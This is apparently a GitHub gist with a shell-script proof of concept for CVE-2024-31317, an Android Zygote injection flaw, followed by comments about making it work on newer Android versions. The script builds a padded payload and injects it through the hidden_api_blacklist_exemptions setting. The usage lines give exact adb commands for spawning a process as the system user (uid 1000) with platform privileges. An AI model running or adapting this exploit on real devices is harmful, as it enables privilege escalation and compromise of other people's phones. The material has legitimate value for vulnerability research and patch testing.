Created
July 13, 2024 17:27
-
-
Save rabits/ecae96c256cb25726b2bb92c73f9c081 to your computer and use it in GitHub Desktop.
CVE-2024-31317 PoC 2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317: | |
| # https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html | |
| # | |
| # USAGE (android 13, with pre-13 use 12200 instead of 32768): | |
| # host$ adb push payload.sh /sdcard/ | |
| # host$ adb shell | |
| # shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \ | |
| # --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \ | |
| # --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \ | |
| # --instruction-set=x86 --app-data-dir=/data/user/0/jackpal.androidterm --package-name=jackpal.androidterm --is-top-app \ | |
| # android.app.ActivityThread seq=40)"; logcat | |
| # Getting the values from parameters | |
| buffer_size=$1 | |
| shift | |
| zygote_read_abort_size=$1 | |
| shift | |
| zygote_args_len=$# | |
| # What's predefined in the executed command when execute `settings put global hidden_api_blacklist_exemptions <val>` | |
| prefix="6 --set-api-denylist-exemptions " | |
| prefix_len=$(echo -n "$prefix" | wc -c) | |
| add_chars=$(($buffer_size - $prefix_len + 2)) | |
| # For tests: echo the prefix, delete from prod: | |
| #echo "6\n--set-api-denylist-exemptions" | |
| # Making pad to fill the first buffer and amount should go in the next buffer | |
| payload=$(printf "\n\n\n\n\n%${add_chars}s" $zygote_args_len | tr ' ' A) | |
| # Printing each zygote argument to run | |
| for arg in "$@"; do | |
| payload="$payload\n$(echo "$arg")" | |
| done | |
| echo "$payload" | |
| payload_len=$(echo "$payload" | wc -c) | |
| echo -n ,,,, | |
| add_chars=$(($buffer_size*2 - ($prefix_len + $payload_len) - 1)) | |
| printf "%${add_chars}s" 'X' | tr ' ' 'X' | |
| echo E |
Author
Well, if I can ensure that it's the same commands as A11 that are known to work, what is missing in A12/13? Can the padding be excessive?
I guess you were not able to implement this to the letter?
https://blog.flanker017.me/cve-2024-31317/
@rabits
How about his site:
https://github.com/agg23/cve-2024-31317/blob/master/explanation.md
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
On Android >11 there are additional measures implemented which needs to be mitigated. It crashes zygote if done improperly (not correct commands or padding - you can find that if will check zygote crash output). Maximum I was able to achieve is to execute command, then it passed into zygote, but was never able to properly execute a second one to steal it's pid. I suppose precise timing & control is needed, or I'm missing something crucial. And yeah, every execution of PoC I had to reboot the device, otherwise zygote stays in this corrupted state...